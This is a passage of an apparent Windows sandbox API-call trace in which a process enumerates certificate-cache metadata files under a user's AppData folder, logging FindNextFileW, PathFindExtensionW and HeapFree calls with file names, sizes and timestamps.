ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0237.110] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0237.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.110] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0237.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.111] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0237.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0237.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0237.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.112] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0237.113] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0237.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.113] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0237.113] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0237.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.113] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0237.113] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0237.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0237.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 